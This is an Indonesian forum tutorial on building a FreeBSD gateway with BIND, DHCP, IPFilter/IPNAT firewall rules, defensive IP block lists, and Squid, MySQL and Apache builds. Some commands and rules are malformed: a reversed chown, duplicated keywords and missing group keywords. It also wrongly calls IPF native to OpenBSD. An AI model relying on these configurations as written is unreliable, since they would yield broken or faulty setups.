Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==

options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==

options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==

forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4
[pre]
Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.
[/pre]

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:

#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"

2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:

su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3

semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

[pre]
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
[/pre]

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi

#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122